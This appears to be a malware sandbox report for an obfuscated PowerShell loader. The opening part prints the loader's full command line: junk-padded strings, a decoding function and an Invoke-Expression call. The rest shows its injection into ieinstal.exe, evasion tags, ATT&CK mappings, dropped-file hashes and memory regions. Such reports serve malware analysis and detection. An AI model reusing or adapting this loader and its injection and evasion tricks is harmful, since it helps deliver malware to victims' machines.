KEni3BeFAk9LeD BD SF a9FnF LF LD R0KaAPa4FoA R4MoAPo4In'st;du&No( R`$DiBReiMioKor ShasyAat shtam E7 R)Tr N`$ AFHaoUpr Th Sa TnAmdAnl BeFarMia GfNet TaAnlFreWarUns R6Dr;Si`$ ePdehCha PlToa BrAnoKnpGae J0Ov1 F P=Ti BlPWahkoa Hl Aa IrEloSkp Be S0De4Lu P' ZASu9SaCfo3 EE d2 UEHu3 TE U8 SEfo0 EFFoDTaEChC EFPr9GeE H5HeEAf4CaEGoENoA TDunB C0SeA SDAnDCo6SuDWaE iF K4FoFSeE GF D9 EE G8 BEUn0ErA s3joDStFInFOk8PrE S3NoFLy9 SEFl4SeE F0ChE E8OsA I3HyCTe4 DERi3faF R9UmE U8 FF FF REFa2 fFIlDReD SEStE F8 SFhiFCoFDaBskEMa4HyE EEBeEBo8 OFEpEKrABl3FeCCo0CoESkCMoFAdFStFMiE BEBi5 FELiCNoENo1 PD K0GiB C7TrBdr7DaCRnAHvEOv8 EF R9frCkl9ToESk8AfEBr1 hEFl8DiEStAsnE CCepF H9OmEMo8 uCPhBCoE m2 gFEgFPuC RBSiFCa8ShESt3ByEViE FFNo9AlECh4KrE D2 cERe3AuD ADReEDi2BeE M4StEOp3VaF B9 SE T8 CFQuFlaARi5 BA R5 ME bBUnEAf6InFteD CA KD GA v9ReFGnDDaERe2DiF PFLoE A6 DEDi0ViEToCRoEgo3BoA YDYnA W9AcD RDBuEIn5 DECoCPiE E1 UE BC SFMaFTaE S2KiFTrDtlETt8TrB EDSkBToDSeAPh4GrA E1HyAInDPyAre5ReCMzA SCLn9 ADfr9FrASsDFlCIuDCoATr5KnD a6AqCfr4BiEAl3StF N9 UD LD AF R9 UF SFKoDCi0ExASk1LeA HDBaD S6MiDHe8EkCKn4 AE S3 VFcl9 BBPaESpBRiF SDUv0 CASl4BaABaDBrACi5 bDCr6MeC S4 KEBi3 PFAu9LuDBoDNaFMi9 NFMyF LD A0 AA I4 SAKo4 CAbe4fi' L;Sk& S( R`$ LB UiUno Jr ShLay Jt shFrmHe7Mi) R T`$HeP phBiaSplPraBurLao SpTieIf0 K1 N;Sy`$ EPSkhFeaByl QaMarJaoDipPhe V0Hv2 H Cu=In TiPPrhPraTalSea HrMuo FpRae B0In4Sm Tr' UA K9 ADEdEAcF c9BrFAf4 PF UF IEpu4ClESv3LoE SABrF TE KE S4NoEva3FrF SEMiFBa9 SFGtFSaF P8 GELi0MaESn8 PE T3GaF O9TeF OEEnAUnD MB G0 DASoDAfDUn6PrD PETaFDi4 UF RE PFPu9 aE E8 ME U0DyAKl3KmDSuFSuF A8DoEBe3 RFHu9StE U4 dE F0peETr8IbA D3 PCKo4OrESk3MyFDe9AnEUr8DuF IFPlEMo2maFPiDGrDSkE FE P8 AF KFNuF RB PESi4NyEInEFaEGe8SeFKuEKaAMi3 kCTo0KvE TC KFMeFRaF tE HEUv5 GESpCJuEZo1TiD S0UdBad7UnB B7 RCPlACiE K8 VFFo9BoCpr9xoETe8 DE T1 IEin8ScEMaAAkEUdCBsF F9VeENo8beCEnBTeE O2 DF mFPjCGrB BFOv8PoEIn3 CE SEImF U9 UE S4NeE t2CoEMa3 MDAgD UEmi2VeEOm4GuE N3 KF m9SeEAf8 BFFuFSkAHe5 RADe5 HEChBlsEPa6RrF SD OASeDOvADu9UkC E1FlE e4 PE U3 SEHu8UnEAjCSaEsv0TrEEp8 GEIn3DeF D9ReE DCNoE H1PhA EDFiA s9 UDDiDGeE C5UnE PC sE b1 ME MC HFPlFBiE c2 tFSaDAkE P8 AB SD NBFiEGaACu4 UA F1FiAEpD KABe5GrCChA UCDr9 MDPe9 VAPaDBrCKnD aABe5KoD A6 ECLu4 PESy3TrFCa9PrDInDReF T9 LF BFBkDSp0 IAOw4AfAThD TA C5KoDAp6 KC C4 PETr3niF S9 AD nDouFTa9 FFTrFEnD F0OuADy4 GA M4 kAAf4Sn' F; C& S(Pe`$ ABGri PoFur BhGry MtMohKlm P7 S)Sp Hi`$FoP FhRoa SlJaaMrrFoo LpRte e0Ha2Gu;Va`$ eFProSer AhPla PnRedEol ReExrToa FfDetDra Bl SeMyrBosma7Ix Co= U InPKahgga Pl Ka brHyo Fp SeKo0St4Af Me'PaA B9beC AEHoE P5AfE ACSuF L9PaF D9 NE U8TeESu1InE R4muF T7BrEAfCSaFUn9 MEId4IcE L2SuE D3 IA MD HBSe0MaA UD TASl9 HDReEChFFl9BeFsa4boFpaFTeE S4 BEUd3NpESmA HFPoEFrE M4ThE O3ReFunE PF O9OcFTeFAkF D8 FE M0 ME K8 OEOx3foFIn9ReFciE RAUn3 MC F4 hEDe3MoFUnB AELi2BeE a6SiE Y8SeAPr5 SBJoDSuAFr4 B'En;No&Ca( R`$OmB Pi Go Sr ah MyJat PhFimop7Fy) a N`$OuFGioBarInhBiaDin MdPol Se NrOna Ff CtKvaBolIdeKorErsin7 S; H`$ FFSkoEnrNohOva GnCodSplSkeSrr GaRefAnt RaUnl ue SrKns I7 P R=un TPSnhFlaKvlsaa Br Uo PpSpewi0Tj4Pr Sy'VaA M9 MC H3 CEIn2FiE O3 SEDe8 NENe0FrF NDKrE PCSuFVi9BiETa5RaE I4PrE BEDoA D3 PC P4CrE C3 MFGeBflESu2AnE S6TrECi8 CAMi5FlABe9 VC rEOuETe5 VEToCOuFBy9 AF S9FaEQu8AfECa1PaE S4DaFSm7 HELeCAiFSt9MeENa4AtE G2RoEos3CiARi1AfApeDSvBUbDCoATa4Re'Rd; M&Fr(An`$GeBEdiHyoBarAshbayBetOvhVimBu7 S)Fe A`$ AFBeo Hr OhExaQunUndAllUde Fr Ha Cf TtDeaUdl Ue Sr Rs F7co; H`$ApI KapamFabMoe AlDre CgWeuSus L C= I Baf Fk ApMa A`$BiB piNoohorSeh AyMet ShSimPi5Mi P`$ DBPri JoNorDjh Py utShh ImMi6Ja; F`$ UFTvoSmrInhUnaStnEtd Al Renor UaSrfHot AaRglSueUnrRasUn7 S Br=Ne bPInhFiaTylalaMorVioSmpKoe U0 A4 N Ko'EpA S9 RCPoEToE C5meEFo4 SF lF QE m6SkE P8EjEMi9MuB BC ABtr8LiBUnC WBSkE TAPoD bB s0 SASaD VAPa9PuD c8DaE B3PaECoBArE FC HF MF ME S9SkECh1 LEBu8LoANe3StCBa4 sEbr3 GFNoBBiE I2MuE S6TeEUn8TrADa5 FD A6OsCKr4EnEUn3 RF D9ArDYmDSiFuk9EkFCiFMaDSo0BnBOp7 dBMa7SuD f7DuERe8SkFChFKoESh2HoASc1 EAMiD NB A8BeB T5SkBOt5mtA H1InACoD EBFoD PF H5LrB KEAlBKrD DBVuD ABPrDNyA S1 CALoDUnBCoDcoFVe5 BBda9 ABTiDReAOv4 p'Fr;Fi&Dz( T`$AmBAgiDeoTrrswhImypat DhFrmTr7 A)De Lo`$ DFToo SrFohEfa EnHedStlAueSer GaSkfInt Sa ul SeOvr Ds B7Wo;In`$EdFreo Pr DhKoa Dncad MlFde SrSpahaf LtOraDilCdeUnrCysrr8 T Ko=Or BP ShFaa Gl PaTarSnoFepHaeDd0 S4 B Bl'HaAAr9 KD PESwFCa4 WFEmE GF SEskEco8 BERe1 iFKoEFoE DC FFPa9 CF K9MeEre8SkFSyEFlB R8asATiDWeB F0ReASpDGrA p9TiDDr8CoE C3BaEVuB MEDeCPsFInF MEHe9 AE A1BlE G8MoA R3StCFo4CrEma3deF MBFiE P2 SE H6StEDi8FaA D5VoDPr6 BC B4JaE W3 KFOv9ExDUnDRuFBa9reF DFRaD S0PhBba7 CBRe7AkDPh7ruEPl8reF OF OEVa2 PA S1NeABeDEcB RA pB FDGsB TERoB iF BBViD JB DCKrBFuF BBAn5StAOt1DuA sDDeB SDBeF E5 BB LECaBClDPaB UDReBamDKaAOr1BlA PDEnBTeD KF I5 BBDi9GaAFl4Fa'Fe; S&Me(Ov`$BiB PiAfoudr DhLoy StDihSam a7 H) a En`$ uFSeoVirKvhSoa Rn Bd HlBleMarSoaCtfOmtsoa clSleStrGasSu8 C;Un`$SnC nh DiCorAnkReeBrd B1Tr5Ed1Lu2Fo= R`"""Fe`$GreLinMev S:QuT AE SM KP J\ IEDrx EtChrFla Tt FeDer pr Se Bswitror Pi Ta Gl GsLu\AfU EnIbelonBat Nr HeRlntac Dh PepodEr.FjNIteKldPs`""" S; a`$ JFlioNir ShunaBrnTrdAclWaeDirfoa MfTrtKlaChlSme TrKas M9Gr K= U APVeh AaInlPoagrrKaoOmp ae U0 K4Bl S'UdABo9 SCPaB GE I2BaFDiFReEKa5 CECaC VEPo3 BEBj9 SE o1OpE k8PaFOpFGrE WCAnESpBInFLa9FiE GC KE G1klE G8TsF FFTuFPiE IAAgDFoBEl0 SA HDKaD S6 CDInEGrF L4PoF CEHaFSu9DeE S8 BE F0GlA B3ImC r4scC A2 DALe3 PCFlB FE P4NaE B1 VEIr8DjDRi0 SBEn7 EBKo7 GD EFPlE I8 GE UC LE O9 FCUdC iE B1 YESu1 WCUdF IFRe4OuF D9AgEPr8 SFUdE GA P5HyA T9 ECIdEPrESu5InERe4prFTuFKlESa6CrESh8 VESo9OcBLeCopBDi8BeB CCNoB CFLoA U4Fl'De; N&Gr(Ta`$UnB Fi Go UrBeh SySotInhanmHu7Pr) O cr`$BaF RoGlrVihFeaAtnCodunl Te HrOva RfIntAlaLklDeeUnrEns m9Ka; c`$TrBCoe DtEdrNuo OtRehBomjoeFlnSutAr0Ra T=An ChP Vh CaKal RaOvr Ho Sp KeZo0 L4Br D'BeDDe6AfDAzESeFMi4 kF NERuFLy9AfE G8TaEUt0SuA T3 RDHiFReFEr8AvE M3 GFFo9 IELe4FoETh0 TEIn8abATr3OpCFe4 OESt3ocF V9IuEBy8SkFMiF PE k2 BFmeD PDTrEstE D8SaF SF SFNoBKaESa4 UE DESaEKi8FoFSpECoA F3 UC T0 AEWoC SFInFtoFSoEDoEEc5 OE VCTrEDi1 CDVi0 CBho7ErBOp7MyCMiE MESt2HyFInDPsFMa4GrAAf5MiAPr9SuC VBAgEYu2GlFDvFsrEHa5AuE ACReE V3 sEUt9 VE W1RuEDy8CaFDeFSuE FCInEOvBFaF B9GeE OCDdEAr1FrEHo8DiFRbFFiFExE HA I1JaASeD SBPrCHoBApDScBReFHyBou9 RA G1 FABoD sALiDliA A9fuCDrEruE W5MiE E4SoF BFErE I6FoEAf8PrE H9 WB KC DB E8 EBRaC BBSlESaAbo1 AAspDLnB T8 TB D5keB k5phA S4 V' A; G&co( O`$ SB PiAmo PrSthSjyBotKlh Am T7 M)Oz P`$PrB MeCot Er roVatFohAsmree FnSktSo0Fo;Sh`$ ADVirOtoSem Ce CtOue ArSy=Ve`$ MFNao GrTrhTraInnRhd Al veSkrFea UfPhtCoaFrl He vr UsLo.KrcOpo MulenRet P- g5An8Hu8Sk- P1No0St2Ha4Si;Ut`$ ABSneCot CrHeoFrtPeh Um SeAgnSot A1El Le= E IP Dh Sa KlToaJarProAnpFle A0 K4 S Re'CuDDy6 BDRoEFeF B4StFFjEPrFCh9 IE p8 TE I0BeASt3BeDHiFAfF R8CoEAr3 TFMi9FuE K4MeE G0UrELi8uhAdi3NeCSm4MoE S3 AFOp9 CENe8 PF UF fE M2EkFPaDGoDSeE kEAn8 PFHyFGaFUnBskEDi4MaE SE BEUn8 RFMuE AASt3 pCSa0 RESlCAfFRgF SF vE TEfl5 CE BC DE U1InD H0UdB S7 JB b7 SC SE dESo2 SFBeD TFKl4 MAGs5AtAAk9CeCAmB PE P2 IFReF ME S5SkECeCMiEDe3 PE D9FoEOv1MuERa8 HF BFFiELeCBrE GBBeFTa9CeE CC eESa1 SE D8 OF DF AFSeEOmADo1ElAStDBrBDa8 EBRe5 BBIm5JoABa6 UBMaC tBPlDCaBNoF GB p9 LANo1 PAStD PA S9TeDErEmeFNa4MaFSuE PFFoEPaEFr8inESu1 RF uEOvEBeCBdF D9RyFEm9SuE C8NgF OE fBMa8RaA S1AuAPoDGoAJa9StCPa9OrF SFFoEKa2FoESt0 ME R8 RF M9NuEFa8 LFflF PAAp4Ch'Kn;Ov& P(Pi`$AnB GiKro RrFohCuyRetPyhPem s7sm)As Af`$NaBJue St DrScoBetOphFrm CeBinRet h1 S;Wh`$BeBTieAft Wr Io TtCahArm Oekrnett C2 b Ar= S FrPVah JaKil FaBar UoDipBoe W0 F4 T Di' BAUn9RaDIr9 SENo0NeEIn3 LE d4FrE M3OuE NAReA RDUdB y0SkASaD DDWh6 AD vEEfFna4FrFThE AF P9CoE D8UnE P0acA P3SlDMiF IFEl8 UEIn3FoF N9 FE P4brE S0HeE U8TrATv3 RCun4 RESl3 AF b9AfERu8PlF HF KE U2 BF XD DD IEedENo8CaFdyFVaF PB EE k4VeENoELeERe8 PF AEGeA S3QuCIn0MaE nCSuFLiFStFPeESkE A5BeE cCRaE B1MaDsa0BoBIn7VaB m7InCUnAEkEOs8NaFep9AdC C9MaECo8PrEFl1DfE M8KnE TAHiESoCOuFSt9chEFl8WiCCuB KEbi2 AFNoF KCLsBWaFNo8 EERe3SlESkEOvFTu9SkEPe4RuE C2TaE P3CoDPyDCyECu2RiE P4AnEUr3AnFHe9 AEUd8PaFbaF FABo5UnA H5 LECaB BESh6HyFWiD OA PDRvA D9GrC ME BE CC PFAb9 EEPo5RaE A8GeE SEOuF f9 GE b4GeEPrEBaATyD TA A9SoCSl9NoEOv8SyE BC ME P0TyE S4 KERe3 UEta4LiFVaEElE I8PaA A4MiA P1 SA BD PAEd5InCFaADiCSe9 DDSo9ScA LD TCLoD BA D5foDBl6 PCOv4 PEre3FeFHe9TiDSuDMaFPr9FrFUnF TD C0OuA B1SaA mDSaDAn6AfCAk4FiE S3ReF S9 IDSsDDmFHo9UnF FFSwD D0 SA A1 SA PD FD V6MoCAp4PlEKa3 WF U9ReDMeDBrFGr9EnFknFJaD S0 PA U1 FAUdDPaD M6spCOr4 dEth3 BFDi9FoDPeDDeFOb9CrF WF mDFi0 RAge1InA AD PD F6 KCHu4 RESp3 RFGa9NeD BD NFmu9 TF CFNoD f0TrAAb4EnARaDStAEn5 FD S6teCMi4ReEPh3afFKo9 lDFlDKoF V9BoF JFTrDOv0 TAFr4SuA S4FoA f4 G'Bu;Af& V(la`$ SBIniSkoGrrunh Sy Ft Eh Gm R7Pr) Z Mo`$SuB HePatFlrJooNotRohBrmFoeKon RtFd2Ky; A`$SnBFee St IrUno ht Oh sm Be UnJot W3Sw P=Ex SaP ahOsaFil Da Sr FoOtpFoeSt0 S4Ve Fo'SoA D9 LDdi9MaE R0MuE S3EnEVe4FuE H3InEBiASeA a3ViCTo4 NECe3FaF NBReEAf2FaEFa6LaE S8seAEn5BuA N9 BCdoEGaEDa5GuE M4BlF AF UEBr6PaEFo8AfE E9BeB KCUrB D8 SBBaC TBPiEReA U1shA H9 ID CE AFMa4 AF BEunFekESpE S8PrESm1 PFDiE PEBrCKoFFi9 PFCh9PaERe8SpF MEFlBIn8AuACr1phAUn9UkCRk4HaEUsCKlETo0AcEGrFAmE t8 BE H1ExE E8 FELaA PFAf8ExF PEPlANo1 BB UD HASk1 cBAnDMaAbo4 B' C;Ds& S(Al`$BaBNai coOvr OhdoyAft Ch MmSo7Li)Ky Sn`$StBDue GtTor SoAdt OhInm jeCon Et V3 l#Se;""";;Function Betrothment9 { param([String]$Sinistrogyric); For($Papfabrikkerne=2; $Papfabrikkerne -lt $Sinistrogyric.Length-1; $Papfabrikkerne+=(2+1)){ $Overhoveder = $Sinistrogyric.Substring($Papfabrikkerne, 1); $Phalarope = $Phalarope + $Overhoveder; } $Phalarope;}$Tylvts0 = Betrothment9 'SaIOrEPeXBl ';$Tylvts1= Betrothment9 $Datterselskabet;&$Tylvts0 $Tylvts1;<#Rubrica Daugbjerg Soupon Poetisssr #>;"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          4⤵
          • Checks QEMU agent file
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:2444

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Extraterrestrials\Ruchernes.Pre
    Filesize

    25KB

    MD5

    6947c3d9ecde3d39790721c3c83fa478

    SHA1

    62b781836f42e0abda502abdb44cb209ffbb45e5

    SHA256

    de24b75c0d91d118703630e42e1e844c1f480c183697c1661b48cbfb5fa9394d

    SHA512

    5f6fd595a6aade1f117016f00211aa32aaf6b2d6c76ded89d92cd3189494c7047540aca08f477c97caac7d048326770b4e3a706b990767a13dfecd8316041163

  • C:\Users\Admin\AppData\Local\Temp\Extraterrestrials\Unentrenched.Ned
    Filesize

    253KB

    MD5

    5d7b86866b1b04783081d386d0e813f5

    SHA1

    0bdec7dbaff9697d8eeace27ca5364113bdd2661

    SHA256

    031e6c7b1573121d659bd50f361f544580b277970b2f119e6e439f5fc1f82818

    SHA512

    25bec3d363a33f85c2cb00cd016ccb723495e81a79175e180e43a042a1c481ff71e0246a560688fc9ec4a7ab582a127139cd64c5b5f7c587ece988aa521c558d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJRCPAC5YUSNEACPNBQ4.temp
    Filesize

    7KB

    MD5

    65a4cab23d7acba0579c1da53f2f8e59

    SHA1

    aa308ec80c39afcf964a65dafe7062b3db97eebd

    SHA256

    252989bb9b8477ed42ddb4885f7e35ba6f899780e3d4dcfc0be8439acdf34de6

    SHA512

    64a15d8b284d74212ab08ade4636ce8387336d113b64f264d2fe763ce0d9d033c63b8345d54fc1c281cc248b61fa3ba8abe3973d59dfc88db9354d4b17fabd9a

  • memory/1344-12-0x0000000073730000-0x0000000073CDB000-memory.dmp
    Filesize

    5.7MB

  • memory/1344-13-0x0000000073730000-0x0000000073CDB000-memory.dmp
    Filesize

    5.7MB

  • memory/1344-9-0x0000000073731000-0x0000000073732000-memory.dmp
    Filesize

    4KB

  • memory/1344-11-0x0000000073730000-0x0000000073CDB000-memory.dmp
    Filesize

    5.7MB

  • memory/1344-10-0x0000000073730000-0x0000000073CDB000-memory.dmp
    Filesize

    5.7MB

  • memory/1344-23-0x0000000073730000-0x0000000073CDB000-memory.dmp
    Filesize

    5.7MB

  • memory/1344-32-0x0000000073730000-0x0000000073CDB000-memory.dmp
    Filesize

    5.7MB

  • memory/2444-22-0x0000000000D50000-0x0000000005060000-memory.dmp
    Filesize

    67.1MB

  • memory/2444-24-0x0000000000400000-0x0000000000615000-memory.dmp
    Filesize

    2.1MB

  • memory/2564-21-0x0000000006090000-0x000000000A3A0000-memory.dmp
    Filesize

    67.1MB